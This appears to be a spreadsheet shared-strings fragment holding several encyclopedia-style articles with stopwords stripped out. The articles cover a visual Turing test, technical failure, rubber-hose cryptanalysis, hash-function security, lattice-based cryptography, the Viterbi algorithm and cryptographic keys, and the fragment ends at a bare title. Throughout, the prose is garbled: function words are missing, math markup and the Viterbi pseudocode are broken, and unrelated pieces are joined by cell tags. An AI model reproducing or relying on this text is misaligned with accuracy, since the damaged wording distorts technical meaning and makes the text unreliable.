generator achieves continuity question sequences. this means object instantiated tries explore details. apart finding attributes relation objects, localisation also important step. thus, next step query generator tries localise object region first identified, restricts instantiation questions regions within original region. simplicity preference simplicity preference states query generator pick simpler questions complicated ones. simpler questions ones fewer attributes them. gives ordering questions based number attributes, query generator prefers simpler ones. estimating predictability select next question sequence, estimate predictability every proposed question. this done using annotated training images. each image annotated bounding around objects labelled attributes, pairs objects labelled relations.consider question type separately: instantiation questions: conditional probability estimator instantiation questions represented {\displaystyle \quad {\widehat {p}}(x_{q}=1)={\frac {\#\{i\in t,h(i)=1,x_{q}(i)=1\}}{\#\{i\in t,h(i)=1\}}}} question considered denominator least images. condition {\displaystyle h(i)=1} strict true large number images, every question history eliminates approximately half candidates (images case). result, history pruned questions alter conditional probability eliminated. having shorter history lets consider larger number images probability estimation. history pruning done stages: first stage attribute relationship questions removed, assumption presence instantiation objects depends objects attributes relations. also, existence questions referring regions disjoint region referred proposed question, dropped assumption probability presence object location {\displaystyle change presence absence objects locations {\displaystyle finally uniqueness questions negative response referring regions disjointed region referred proposed question, dropped assumption uniqueness questions positive response dropped alter response future instantiation questions. history questions obtained first stage pruning referred {\displaystyle h_{q}'} second stage image-by-image pruning performed. {\displaystyle q_{i}} uniqueness question {\displaystyle pruned preserved {\displaystyle h_{q}'} question context region disjoint region referenced proposed question, expected answer question {\displaystyle constraints first stage. actual answer question training image {\displaystyle training image considered probability estimation, question {\displaystyle q_{i}} also dropped. final history questions {\displaystyle {\tilde {h}}(q,i)} probability given {\displaystyle \quad {\widehat {p}}(x_{q}=1)={\frac {\#\{i\in t,{\tilde {h}}(q,i)=1,x_{q}(i)=1\}}{\#\{i\in t,{\tilde {h}}(q,i)=1\}}}} attribute questions: probability estimator attribute questions dependent number labeled objects rather images unlike instantiation questions.consider attribute question form ‘does object attribute a?’, {\displaystyle o_{t}} object type {\displaystyle {\displaystyle a\in a_{t}} {\displaystyle attributes already known belong {\displaystyle o_{t}} history. {\displaystyle {\mathcal {o}}_{\mathbb annotated objects (ground truth) training set, {\displaystyle o\in {\mathcal {o}}_{\mathbb {\displaystyle {\mathcal {t}}_{\mathbb }(o)} type object, {\displaystyle {\mathcal {a}}_{\mathbb }(o)} attributes belonging {\displaystyle then estimator given {\displaystyle \quad p(x_{q}=1)={\frac {\#\{o\in {\mathcal {o}}_{\mathbb }:{\mathcal {t}}_{\mathbb }(o)=t,a\cup \{a\}\subseteq {\mathcal {a}}_{\mathbb }(o)\}}{\#\{o\in {\mathcal {o}}_{\mathbb }:{\mathcal {t}}_{\mathbb }(o)=t,a\subseteq {\mathcal {a}}_{\mathbb }(o)\}}}} this basically ratio number times object {\displaystyle type {\displaystyle attributes {\displaystyle a\cup \{a\}} occurs training data, number times object {\displaystyle type {\displaystyle attributes {\displaystyle occurs training data. high number attributes {\displaystyle leads sparsity problem similar instantiation questions. deal partition attributes subsets approximately independent conditioned belonging object {\displaystyle o_{t}} e.g. {\displaystyle t={}} person, attributes like crossing street standing still independent, fairly independent person, whether person child adult, whether carrying something not. these conditional independencies reduce size {\displaystyle thereby overcome problem sparsity. relationship questions: approach relationship questions attribute questions, instead number objects, number pair objects considered independence assumption, relationships independent attributes related objects relationships independent included. example detailed example sequences found here. dataset images considered geman work ‘urban street scenes’ dataset, scenes streets different cities across world. this types objects constrained people vehicles experiment. another dataset introduced planck institute informatics known daquar dataset real world images indoor scenes. propose different version visual turing test takes holistic approach expects participating system exhibit human like common sense. conclusion this recent work published march 2015, journal proceedings national academy sciences, researchers brown university johns hopkins university. evaluates computer vision systems understand images compared humans. currently test written interrogator machine oral evaluation human interrogator gives humans undue advantage subjective, also expects real time answers. visual turing test expected give direction computer vision research. companies like google facebook investing millions dollars computer vision research, trying build systems closely resemble human visual system. recently facebook announced platform looks image provides description help visually impaired. such systems might able perform well vtt. references</t>
  </si>
  <si>
    <t>Technical failure</t>
  </si>
  <si>
    <t>technical failure (unwanted) error technology based systems. causality causalities include fatigue attenuation distortions. also absolute probability judgement accident-proneness human reliability human–machine system latent human error order disorder (physics) sociotechnical system why–because analysis</t>
  </si>
  <si>
    <t>Rubber-hose cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, rubber-hose cryptanalysis euphemism extraction cryptographic secrets (e.g. password encrypted file) person coercion torture—such beating person rubber hose, hence name—in contrast mathematical technical cryptanalytic attack. details according amnesty international many countries world routinely torture people. therefore logical assume least countries would willing use) form rubber-hose cryptanalysis. practice, psychological coercion prove effective physical torture. physically violent highly intimidating methods include tactics threat harsh legal penalties. incentive cooperate form plea bargain, offer drop reduce criminal charges suspect return full co-operation investigators. alternatively, countries threats made prosecute co-conspirators inflict violence upon) close relatives (e.g. spouse, children, parents) person questioned unless co-operate.in contexts, rubber-hose cryptanalysis viable attack need decrypt data covertly; information password lose value known compromised. argued purposes strong cryptography force adversaries resort less covert attacks.the earliest known term sci.crypt newsgroup, message posted october 1990 marcus ranum, alluding corporal punishment: ...the rubber-hose technique cryptanalysis. rubber hose applied forcefully frequently soles feet cryptosystem discovered, process take surprisingly short time quite computationally inexpensive). although term used tongue-in-cheek, implications serious: modern cryptosystems, weakest link often human user. direct attack cipher algorithm, cryptographic protocols used, likely much expensive difficult targeting people manage system. thus, many cryptosystems security systems designed special emphasis keeping human vulnerability minimum. example, public-key cryptography, defender hold encrypt message, decryption needed decipher problem defender unable convince attacker stop coercion. plausibly deniable encryption, second created unlocks second convincing relatively harmless message (for example, apparently personal writings expressing "deviant" thoughts desires type lawful taboo), defender prove handed keys whilst attacker remains unaware primary hidden message. case, designer's expectation attacker realize this, forego threats actual torture. risk, however, attacker aware deniable encryption assume defender knows key, meaning attacker refuse stop coercing defender even keys revealed: assumption defender still withholding additional keys hold additional information. jurisdictions, statutes assume opposite—that human operators know access things session keys, assumption parallels made rubber-hose practitioners. example united kingdom's regulation investigatory powers act, makes crime surrender encryption keys demand government official authorized act. according home office, burden proof accused person possession rests prosecution; moreover, contains defense operators lost forgotten key, liable judged done recover key. possible case lead-up 2017 kenyan general election, head information, communication, technology independent electoral boundaries commission, christopher msando, murdered. played major role developing voting system election. body showed apparent marks torture, concerns murderers tried password information him. popular culture well-known xkcd comic (xkcd 538: security) describes issue. first panel crypto nerd imagines advanced encryption (4096-bit rsa), crackers ultimately defeated, despite access million-dollar hardware. second panel, people desire access information five-dollar wrench torture coerce nerd give password. also references external links best defense against rubber-hose cryptanalysis, cory doctorow</t>
  </si>
  <si>
    <t>Security of cryptographic hash functions</t>
  </si>
  <si>
    <t>cryptography, cryptographic hash functions divided main categories. first category functions whose designs based mathematical problems, whose security thus follows rigorous mathematical proofs, complexity theory formal reduction. these functions called provably secure cryptographic hash functions. construct difficult, examples introduced. their practical limited. second category functions based mathematical problems, ad-hoc constructions, bits message mixed produce hash. these believed hard break, formal proof given. almost hash functions widespread reside category. some functions already broken, longer use. hash function security summary. types security hash functions generally, basic security cryptographic hash functions seen different angles: pre-image resistance, second pre-image resistance, collision resistance, pseudo-randomness. pre-image resistance: given hash {\displaystyle hard find message {\displaystyle {\displaystyle h=hash(m)} this concept related one-way function. functions lack property vulnerable pre-image attacks. second pre-image resistance: given input {\displaystyle m_{1}} hard find another input, {\displaystyle m_{2}} (not equal {\displaystyle m_{1}} {\displaystyle hash(m_{1})=hash(m_{2})} this property sometimes referred weak collision resistance. functions lack property vulnerable second pre-image attacks. collision resistance: hard find different messages {\displaystyle m_{1}} {\displaystyle m_{2}} {\displaystyle hash(m_{1})=hash(m_{2})} such pair called (cryptographic) hash collision. this property sometimes referred strong collision resistance. requires hash value least twice long required pre-image resistance, otherwise collisions found birthday attack. pseudo-randomness: hard distinguish pseudo-random number generator based hash function random number generator, e.g., passes usual randomness tests. meaning "hard" basic question meaning "hard". there approaches answer question. first intuitive/practical approach: "hard means almost certainly beyond reach adversary must prevented breaking system long security system deemed important." second approach theoretical based computational complexity theory. problem hard, exists formal security reduction problem widely considered unsolvable polynomial time, integer factorization problem discrete logarithm problem. however, non-existence polynomial time algorithm automatically ensure system secure. difficulty problem also depends size. example, public cryptography relies difficulty integer factorization. however, considered secure keys least 2048 bits large. password case also, inputs hash relatively small ordered likelihood way, brute force search practical, regardless theoretical security. likelihood recovering preimage depends input size speed cost computing hash function. common example hashes store password validation data. rather store plaintext user passwords, access control system typically stores hash password. when person requests access, password submit hashed compared stored value. stored validation data stolen, thief hash values, passwords. however users choose passwords predictable ways often passwords short enough possible combinations tested fast hashes used. special hashes called derivation functions created slow searches. password cracking. cryptographic hash functions most hash functions built basis, bits message nicely mixed produce hash. various bitwise operations (e.g. rotations), modular additions compression functions used iterative mode ensure high complexity pseudo-randomness output. way, security hard prove proof usually done. only years ago, popular hash functions, sha-1, shown less secure length suggested: collisions could found tests, rather brute-force number 280. words, hash functions nowadays provably collision-resistant. these hashes based purely mathematical functions. this approach results generally effective hashing functions, risk weakness function eventually used find collisions. famous case md5. meaning "hard find collision" cases means "almost certainly beyond reach adversary must prevented breaking system long security system deemed important." meaning term therefore somewhat dependent application, since effort malicious agent task usually proportional expected gain. provably secure hash functions approach, base security hash function hard mathematical problem prove finding collisions hash functions hard breaking underlying problem. this gives somewhat stronger notion security relying complex mixing bits classical approach. cryptographic hash function provable security collision attacks finding collisions provably polynomial-time reducible problem supposed unsolvable polynomial time. function called provably secure, provable. means finding collisions would feasible polynomial time algorithm could find polynomial time algorithm (reduction algorithm) would algorithm solve problem widely supposed unsolvable polynomial time. that contradiction. this means finding collisions cannot easier solving however, indicates finding collisions difficult 'some' cases, instances computationally hard problem typically hard. indeed, large instances np-hard problems routinely solved, hardest practically impossible solve. hash functions proof security based mathematical functions. hard problems examples problems, assumed solvable polynomial time discrete logarithm problem finding modular square roots integer factorization problem subset problem downsides provable approach current collision-resistant hash algorithms provable security reductions inefficient used practice. comparison classical hash functions, tend relatively slow always meet criteria traditionally expected cryptographic hashes. very smooth hash example. constructing hash function provable security much difficult using classical approach hope complex mixing bits hashing algorithm strong enough prevent adversary finding collisions. proof often reduction problem asymptotically hard worst-case average-case complexity. worst-case measures difficulty solving pathological cases rather typical cases underlying problem. even reduction problem hard average complexity offers limited security still algorithm easily solves problem subset problem space. example, early versions fast syndrome based hash turned insecure. this problem solved latest version.swifft example hash function circumvents security problems. shown algorithm break swifft probability within estimated time find algorithm solves worst-case scenario certain difficult mathematical problem within time depending example (impractical) provably secure hash function hash(m) hard factor composite number, prespecified base value. collision congruent reveals multiple order such information used factor polynomial time assuming certain properties algorithm quite inefficient requires average multiplications modulo message-bit. more practical provably secure hash functions very smooth hash function provably secure collision-resistant hash function assuming hardness finding nontrivial modular square roots modulo composite number {\displaystyle (this proven hard factoring {\displaystyle muhash ecoh elliptic curve only hash function based concept elliptic curves, subset problem summation polynomials. security proof collision resistance based weakened assumptions eventually second pre-image attack found. fast syndrome-based hash function proven breaking least difficult solving certain np-complete problem known regular syndrome decoding. swifft swifft based fast fourier transform provably collision resistant, relatively mild assumption worst-case difficulty finding short vectors cyclic/ideal lattices. chaum, heijst, pfitzmann hash function compression function finding collisions hard solving discrete logarithm problem finite group {\displaystyle f_{2p+1}} knapsack-based hash functions family hash functions based knapsack problem. zémor-tillich hash function family hash functions rely arithmetic group matrices sl2. finding collisions least difficult finding factorization certain elements group. this supposed hard, least pspace-complete. hash, attack eventually discovered time complexity close {\displaystyle 2^{n/2}} this beat birthday bound ideal pre-image complexities {\displaystyle 2^{3n/2}} {\displaystyle 2^{3n}} zémor-tillich hash function. attacks include birthday search reduced size {\displaystyle indeed destroy idea provable security invalidate scheme rather suggest initial parameters small. hash functions sigma protocols exists general constructing provably secure hash, specifically (suitable) sigma protocol. faster version (called vsh*) could obtained way. references</t>
  </si>
  <si>
    <t>Lattice-based cryptography</t>
  </si>
  <si>
    <t>lattice-based cryptography generic term constructions cryptographic primitives involve lattices, either construction security proof. lattice-based constructions currently important candidates post-quantum cryptography. unlike widely used known public-key schemes rsa, diffie-hellman elliptic-curve cryptosystems—which could, theoretically, defeated using shor's algorithm quantum computer—some lattice-based constructions appear resistant attack classical quantum computers. furthermore, many lattice-based constructions considered secure assumption certain well-studied computational lattice problems cannot solved efficiently. history 1996, miklós ajtai introduced first lattice-based cryptographic construction whose security could based hardness well-studied lattice problems, cynthia dwork showed certain average-case lattice problem, known short integer solutions (sis), least hard solve worst-case lattice problem. showed cryptographic hash function whose security equivalent computational hardness sis. 1998, jeffrey hoffstein, jill pipher, joseph silverman introduced lattice-based public-key encryption scheme, known ntru. however, scheme known least hard solving worst-case lattice problem. first lattice-based public-key encryption scheme whose security proven worst-case hardness assumptions introduced oded regev 2005, together learning errors problem (lwe). since then, much follow-up work focused improving regev's security proof improving efficiency original scheme. much work devoted constructing additional cryptographic primitives based related problems. example, 2009, craig gentry introduced first fully homomorphic encryption scheme, based lattice problem. mathematical background linear algebra, lattice {\displaystyle l\subset \mathbb ^{n}} integer linear combinations vectors basis {\displaystyle \{\mathbf _{1},\ldots ,\mathbf _{n}\}} {\displaystyle \mathbb ^{n}} words, {\displaystyle l={\big \{}\sum a_{i}\mathbf _{i}\ a_{i}\in \mathbb {\big \}}\;.} example, {\displaystyle \mathbb ^{n}} lattice, generated standard basis {\displaystyle \mathbb ^{n}} crucially, basis lattice unique. example, vectors {\displaystyle (3,1,4)} {\displaystyle (1,5,9)} {\displaystyle (2,-1,0)} form alternative basis {\displaystyle \mathbb ^{3}} important lattice-based computational problem shortest vector problem (svp sometimes gapsvp), asks approximate minimal euclidean length non-zero lattice vector. this problem thought hard solve efficiently, even approximation factors polynomial {\displaystyle even quantum computer. many (though all) lattice-based cryptographic constructions known secure fact hard regime. selected lattice-based cryptosystems encryption schemes peikert's ring learning with errors (ring-lwe) exchange encryption scheme ntruencrypt signatures güneysu, lyubashevsky, pöppelmann's ring learning errors (ring-lwe) signature signature scheme ntrusign hash functions swifft lash (lattice based hash function) fully homomorphic encryption gentry's original scheme. brakerski vaikuntanathan. security lattice-based cryptographic constructions leading candidates public-key post-quantum cryptography. indeed, main alternative forms public-key cryptography schemes based hardness factoring related problems schemes based hardness discrete logarithm related problems. however, factoring discrete logarithm known solvable polynomial time quantum computer. furthermore, algorithms factorization tend yield algorithms discrete logarithm, vice versa. this motivates study constructions based alternative assumptions, hardness lattice problems. many lattice-based cryptographic schemes known secure assuming worst-case hardness certain lattice problems. i.e., exists algorithm efficiently break cryptographic scheme non-negligible probability, exists efficient algorithm solves certain lattice problem input. contrast, cryptographic schemes based e.g., factoring would broken factoring easy average input,'' even factoring fact hard worst case. however, efficient practical lattice-based constructions (such schemes based ntru even schemes based aggressive parameters), worst-case hardness results known. schemes, worst-case hardness results known certain structured lattices all. functionality many cryptographic primitives, known constructions based lattices closely related objects. these primitives include fully homomorphic encryption, indistinguishability obfuscation, cryptographic multilinear maps, functional encryption. also lattice problems learning errors post-quantum cryptography ring learning errors ring learning errors exchange references bibliography oded goldreich, shafi goldwasser, shai halevi. "public-key cryptosystems lattice reduction problems". crypto ’97: proceedings 17th annual international cryptology conference advances cryptology, pages 112–131, london, 1997. springer-verlag. phong nguyen. "cryptanalysis goldreich–goldwasser–halevi cryptosystem crypto ’97". crypto ’99: proceedings 19th annual international cryptology conference advances cryptology, pages 288–304, london, 1999. springer-verlag. oded regev. lattice-based cryptography. advances cryptology (crypto), pages 131–141, 2006.</t>
  </si>
  <si>
    <t>Viterbi algorithm</t>
  </si>
  <si>
    <t>viterbi algorithm dynamic programming algorithm obtaining maximum posteriori probability estimate likely sequence hidden states—called viterbi path—that results sequence observed events, especially context markov information sources hidden markov models (hmm). algorithm found universal application decoding convolutional codes used cdma digital cellular, dial-up modems, satellite, deep-space communications, 802.11 wireless lans. also commonly used speech recognition, speech synthesis, diarization, keyword spotting, computational linguistics, bioinformatics. example, speech-to-text (speech recognition), acoustic signal treated observed sequence events, string text considered "hidden cause" acoustic signal. viterbi algorithm finds likely string text given acoustic signal. history viterbi algorithm named andrew viterbi, proposed 1967 decoding algorithm convolutional codes noisy digital communication links. has, however, history multiple invention, least seven independent discoveries, including viterbi, needleman wunsch, wagner fischer. introduced natural language processing method part-of-speech tagging early 1987. viterbi path viterbi algorithm become standard terms application dynamic programming algorithms maximization problems involving probabilities. example, statistical parsing dynamic programming algorithm used discover single likely context-free derivation (parse) string, commonly called "viterbi parse". another application target tracking, track computed assigns maximum likelihood sequence observations. extensions generalization viterbi algorithm, termed max-sum algorithm max-product algorithm) used find likely assignment subset latent variables large number graphical models, e.g. bayesian networks, markov random fields conditional random fields. latent variables need, general, connected somewhat similar hidden markov model (hmm), limited number connections variables type linear structure among variables. general algorithm involves message passing substantially similar belief propagation algorithm (which generalization forward-backward algorithm). with algorithm called iterative viterbi decoding find subsequence observation matches best average) given hidden markov model. this algorithm proposed wang deal turbo code. iterative viterbi decoding works iteratively invoking modified viterbi algorithm, reestimating score filler convergence. alternative algorithm, lazy viterbi algorithm, proposed. many applications practical interest, reasonable noise conditions, lazy decoder (using lazy viterbi algorithm) much faster original viterbi decoder (using viterbi algorithm). while original viterbi algorithm calculates every node trellis possible outcomes, lazy viterbi algorithm maintains prioritized list nodes evaluate order, number calculations required typically fewer (and never more) ordinary viterbi algorithm result. however, easy parallelize hardware. pseudocode this algorithm generates path {\displaystyle x=(x_{1},x_{2},\ldots ,x_{t})} sequence states {\displaystyle x_{n}\in s=\{s_{1},s_{2},\dots ,s_{k}\}} generate observations {\displaystyle y=(y_{1},y_{2},\ldots ,y_{t})} {\displaystyle y_{n}\in o=\{o_{1},o_{2},\dots ,o_{n}\}} {\displaystyle number possible observations observation space {\displaystyle 2-dimensional tables size {\displaystyle k\times constructed: each element {\displaystyle t_{1}[i,j]} {\displaystyle t_{1}} stores probability likely path {\displaystyle {\hat {x}}=({\hat {x}}_{1},{\hat {x}}_{2},\ldots ,{\hat {x}}_{j})} {\displaystyle {\hat {x}}_{j}=s_{i}} generates {\displaystyle y=(y_{1},y_{2},\ldots ,y_{j})} each element {\displaystyle t_{2}[i,j]} {\displaystyle t_{2}} stores {\displaystyle {\hat {x}}_{j-1}} likely path {\displaystyle {\hat {x}}=({\hat {x}}_{1},{\hat {x}}_{2},\ldots ,{\hat {x}}_{j-1},{\hat {x}}_{j}=s_{i})} {\displaystyle \forall j,2\leq j\leq table entries {\displaystyle t_{1}[i,j],t_{2}[i,j]} filled increasing order {\displaystyle k\cdot j+i} {\displaystyle t_{1}[i,j]=\max _{k}{(t_{1}[k,j-1]\cdot a_{ki}\cdot b_{iy_{j}})}} argmax {\displaystyle t_{2}[i,j]=\operatorname {argmax} _{k}{(t_{1}[k,j-1]\cdot a_{ki}\cdot b_{iy_{j}})}} ,with {\displaystyle a_{ki}} {\displaystyle b_{iy_{j}}} defined below. note {\displaystyle b_{iy_{j}}} need appear latter expression, non-negative independent {\displaystyle thus affect argmax. input observation space {\displaystyle o=\{o_{1},o_{2},\dots ,o_{n}\}} state space {\displaystyle s=\{s_{1},s_{2},\dots ,s_{k}\}} array initial probabilities {\displaystyle =(\pi _{1},\pi _{2},\dots ,\pi _{k})} {\displaystyle _{i}} stores probability {\displaystyle x_{1}=s_{i}} sequence observations {\displaystyle y=(y_{1},y_{2},\ldots ,y_{t})} {\displaystyle y_{t}=o_{i}} observation time {\displaystyle {\displaystyle o_{i}} transition matrix {\displaystyle size {\displaystyle k\times {\displaystyle a_{ij}} stores transition probability transiting state {\displaystyle s_{i}} state {\displaystyle s_{j}} emission matrix {\displaystyle size {\displaystyle k\times {\displaystyle b_{ij}} stores probability observing {\displaystyle o_{j}} state {\displaystyle s_{i}} .outputthe likely hidden state sequence {\displaystyle x=(x_{1},x_{2},\ldots ,x_{t})} function viterbi {\displaystyle (o,s,\pi ,y,a,b):x} state {\displaystyle i=1,2,\ldots {\displaystyle t_{1}[i,1]\leftarrow _{i}\cdot b_{iy_{1}}} {\displaystyle t_{2}[i,1]\leftarrow observation {\displaystyle j=2,3,\ldots state {\displaystyle i=1,2,\ldots {\displaystyle t_{1}[i,j]\gets \max _{k}{(t_{1}[k,j-1]\cdot a_{ki}\cdot b_{iy_{j}})}} {\displaystyle t_{2}[i,j]\gets \arg \max _{k}{(t_{1}[k,j-1]\cdot a_{ki}\cdot b_{iy_{j}})}} {\displaystyle z_{t}\gets \arg \max _{k}{(t_{1}[k,t])}} {\displaystyle x_{t}\leftarrow s_{z_{t}}} {\displaystyle j=t,t-1,\ldots {\displaystyle z_{j-1}\leftarrow t_{2}[z_{j},j]} {\displaystyle x_{j-1}\leftarrow s_{z_{j-1}}} return {\displaystyle function restated succinct near-python: probability transition matrix. emission matrix. function viterbi(o, em): best_path trellis matrix(length(s), length(o)) hold state given observation. pointers matrix(length(s), length(o)) hold backpointer best prior state determine hidden state's time 0... range(length(s)): trellis[s, π[s] em[s, o[0]] ...and afterwards, tracking state's likely prior state, range(1, length(o)): range(length(s)): argmax(k trellis[k, o-1] tm[k, em[s, trellis[s, trellis[k, o-1] tm[k, em[s, pointers[s, best_path list() argmax( trellis[k, length(o)-1] find best final state range(length(o)-1, -1): backtrack last observation. best_path.insert(0, s[k]) insert previous state likely path pointers[k, backpointer find best previous state return best_path explanation suppose given hidden markov model (hmm) state space {\displaystyle initial probabilities {\displaystyle _{i}} state {\displaystyle transition probabilities {\displaystyle a_{i,j}} transitioning state {\displaystyle state {\displaystyle say, observe outputs {\displaystyle y_{1},\dots ,y_{t}} likely state sequence {\displaystyle x_{1},\dots ,x_{t}} produces observations given recurrence relations {\displaystyle {\begin{aligned}v_{1,k}&amp;=\mathrm {\big (}y_{1}\ k{\big )}\cdot _{k},\\v_{t,k}&amp;=\max _{x\in s}\left(\mathrm {\big (}y_{t}\ k{\big )}\cdot a_{x,k}\cdot v_{t-1,x}\right).\end{aligned}}} here {\displaystyle v_{t,k}} probability probable state sequence {\displaystyle \mathrm {\big (}x_{1},\dots ,x_{t},y_{1},\dots ,y_{t}{\big responsible first {\displaystyle observations {\displaystyle final state. viterbi path retrieved saving back pointers remember state {\displaystyle used second equation. {\displaystyle \mathrm {ptr} (k,t)} function returns value {\displaystyle used compute {\displaystyle v_{t,k}} {\displaystyle t&gt;1} {\displaystyle {\displaystyle t=1} then {\displaystyle {\begin{aligned}x_{t}&amp;=\arg \max _{x\in s}(v_{t,x}),\\x_{t-1}&amp;=\mathrm {ptr} (x_{t},t).\end{aligned}}} here we're using standard definition max. complexity implementation {\displaystyle o(t\times \left|{s}\right|^{2})} better estimation exists maximum internal loop instead found iterating states directly link current state (i.e. edge {\displaystyle {\displaystyle then using amortized analysis show complexity {\displaystyle o(t\times (\left|{s}\right|+\left|{e}\right|))} {\displaystyle number edges graph. example consider village villagers either healthy fever, village doctor determine whether fever. doctor diagnoses fever asking patients feel. villagers answer feel normal, dizzy, cold. doctor believes health condition patients operates discrete markov chain. there states, "healthy" "fever", doctor cannot observe directly; hidden doctor. day, certain chance patient tell doctor feel normal", feel cold", feel dizzy", depending patient's health condition. observations (normal, cold, dizzy) along hidden state (healthy, fever) form hidden markov model (hmm), represented follows python programming language: piece code, start_p represents doctor's belief state patient first visits (all doctor knows patient tends healthy). particular probability distribution used equilibrium one, (given transition probabilities) approximately {'healthy': 0.57, 'fever': 0.43}. transition_p represents change health condition underlying markov chain. example, patient healthy today chance fever tomorrow. emit_p represents likely possible observation (normal, cold, dizzy) given underlying condition (healthy fever). patient healthy chance feeling normal; fever chance feeling dizzy. patient visits three days row, doctor discovers patient feels normal first day, cold second day, dizzy third day. doctor question: likely sequence health conditions patient would explain observations? this answered viterbi algorithm. function viterbi takes following arguments: sequence observations, e.g. ['normal', 'cold', 'dizzy']; states hidden states; start_p start probability; trans_p transition probabilities; emit_p emission probabilities. simplicity code, assume observation sequence non-empty trans_p[i] emit_p[i] defined states i,j. running example, forward/viterbi algorithm used follows: output script this reveals observations ['normal', 'cold', 'dizzy'] likely generated states ['healthy', 'healthy', 'fever']. words, given observed activities, patient likely healthy first also second (despite feeling cold day), contracted fever third day. operation viterbi's algorithm visualized means trellis diagram. viterbi path essentially shortest path trellis. soft output viterbi algorithm soft output viterbi algorithm (sova) variant classical viterbi algorithm. sova differs classical viterbi algorithm uses modified path metric takes account priori probabilities input symbols, produces soft output indicating reliability decision. first step sova selection survivor path, passing unique node time instant, since node branches converging (with branch chosen form survivor path, discarded), difference branch metrics cost) chosen discarded branches indicate amount error choice. this cost accumulated entire sliding window (usually equals least five constraint lengths), indicate soft output measure reliability hard decision viterbi algorithm. also expectation–maximization algorithm baum–welch algorithm forward-backward algorithm forward algorithm error-correcting code viterbi decoder hidden markov model part-of-speech tagging search algorithm references general references viterbi (april 1967). "error bounds convolutional codes asymptotically optimum decoding algorithm". ieee transactions information theory. (2): 260–269. doi:10.1109/tit.1967.1054010. (note: viterbi decoding algorithm described section iv.) subscription required. feldman abou-faycal frigo (2002). fast maximum-likelihood decoder convolutional codes". proceedings ieee 56th vehicular technology conference. vehicular technology conference. vol. 371–375. citeseerx 10.1.1.114.1314. doi:10.1109/vetecf.2002.1040367. isbn 978-0-7803-7467-6. s2cid 9783963. forney (march 1973). "the viterbi algorithm". proceedings ieee. (3): 268–278. doi:10.1109/proc.1973.9030. subscription required. press, teukolsky, vetterling, flannery, (2007). "section 16.2. viterbi decoding". numerical recipes: scientific computing (3rd ed.). york: cambridge university press. isbn 978-0-521-88068-8. rabiner (february 1989). tutorial hidden markov models selected applications speech recognition". proceedings ieee. (2): 257–286. citeseerx 10.1.1.381.3454. doi:10.1109/5.18626. (describes forward algorithm viterbi algorithm hmms). shinghal, godfried toussaint, "experiments text recognition modified viterbi algorithm," ieee transactions pattern analysis machine intelligence, vol. pami-l, april 1979, 184–193. shinghal, godfried toussaint, "the sensitivity modified viterbi algorithm source statistics," ieee transactions pattern analysis machine intelligence, vol. pami-2, march 1980, 181–185. external links implementations java, clojure, wikibooks tutorial convolutional coding viterbi decoding, chip fleming tutorial hidden markov model toolkit (implemented contains description viterbi algorithm viterbi algorithm andrew viterbi (scholarpedia.org). implementations mathematica implementation part support stochastic processes susa signal processing framework provides implementation forward error correction codes channel equalization here. java java julia (hmmbase.jl) perl prolog haskell sfihmm includes code viterbi decoding.</t>
  </si>
  <si>
    <t>Key (cryptography)</t>
  </si>
  <si>
    <t>cryptography piece information, usually string numbers letters stored file, which, processed cryptographic algorithm, encode decode cryptographic data. based used method, different sizes varieties, cases, strength encryption relies security maintained. key’s security strength dependent algorithm, size key, generation key, process exchange. scope used encrypt data plaintext ciphertext. there different methods utilizing keys encryption. symmetric cryptography symmetric cryptography refers practice used encryption decryption. asymmetric cryptography asymmetric cryptography separate keys encrypting decrypting. these keys known public private keys, respectively. purpose since protects confidentiality integrity system, important kept secret unauthorized parties. with public cryptography, private must kept secret symmetric cryptography, important maintain confidentiality key. kerckhoff's principle states entire security cryptographic system relies secrecy key. sizes size number bits defined algorithm. this size defines upper bound cryptographic algorithm’s security. larger size, longer take compromised brute force attack. since perfect secrecy feasible algorithms, researches focused computational security. past, keys required minimum bits length, however, technology advanced, keys broken quicker quicker. response, restrictions symmetric keys enhanced greater size. currently, 2048 commonly used, sufficient current systems. however, current sizes would cracked quickly powerful quantum computer. “the keys used public cryptography mathematical structure. example, public keys used system product prime numbers. thus public systems require longer lengths symmetric systems equivalent level security. 3072 bits suggested length systems based factoring integer discrete logarithms security equivalent symmetric cipher.” generation prevent guessed, keys need generated randomly contain sufficient entropy. problem safely generate random keys difficult addressed many ways various cryptographic systems. directly generated using output random generator (rbg), system generates sequence unpredictable unbiased bits. used directly produce either symmetric random output asymmetric pair generation. alternatively, also indirectly created key-agreement transaction, another password.some operating systems include tools "collecting" entropy timing unpredictable operations disk drive head movements. production small amounts keying material, ordinary dice provide good source high-quality randomness. establishment scheme security dependent exchanged parties. establishing secured communication channel necessary outsiders cannot obtain key. establishment scheme exchange) used transfer encryption among entities. agreement transport types exchange scheme used remotely exchanged entities agreement scheme, secret key, used sender receiver encrypt decrypt information, sent indirectly. parties exchange information (the shared secret) permits party derive secret material. transport scheme, encrypted keying material chosen sender transported receiver. either symmetric asymmetric techniques used schemes.the diffie–hellman exchange rivest-shamir-adleman (rsa) widely used exchange algorithms. 1976, whitfield diffie martin hellman constructed diffie–hellman algorithm, first public algorithm. diffie–hellman exchange protocol allows exchange insecure channel electronically generating shared parties. hand, form asymmetric system consists three steps: generation, encryption, decryption.key confirmation delivers assurance confirmation recipient provider shared keying materials correct established. national institute standards technology recommends confirmation integrated establishment scheme validate implementations. management management concerns generation, establishment, storage, usage replacement cryptographic keys. management system (kms) typically includes three steps establishing, storing using keys. base security generation, storage, distribution, destruction keys depends successful management protocols. password password memorized series characters including letters, digits, special symbols used verify identity. often produced human user password management software protect personal sensitive information generate cryptographic keys. passwords often created memorized users contain non-random information dictionary words. hand, help strengthen password protection implementing cryptographic algorithm difficult guess replace password altogether. generated based random pseudo-random data often unreadable humans.a password less safe cryptographic entropy, randomness, human-readable properties. however, password secret data accessible cryptographic algorithm information security applications securing information storage devices. thus, deterministic algorithm called derivation function (kdf) uses password generate secure cryptographic keying material compensate password’s weakness. various methods adding salt stretching used generation. also references</t>
  </si>
  <si>
    <t>Dixon's factorization method</t>
  </si>
  <si>
